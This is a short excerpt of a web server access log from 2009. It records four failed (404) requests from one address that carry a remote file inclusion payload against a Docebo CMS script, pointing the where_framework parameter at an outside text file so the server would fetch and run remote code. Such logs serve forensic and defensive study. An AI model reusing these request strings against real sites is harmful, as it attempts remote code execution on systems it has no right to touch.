207.58.140.78 - - [28/Jul/2009:01:09:37 -0400] "GET /logs/access_log.Q109061800%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:01:09:37 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:01:09:37 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:01:09:37 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
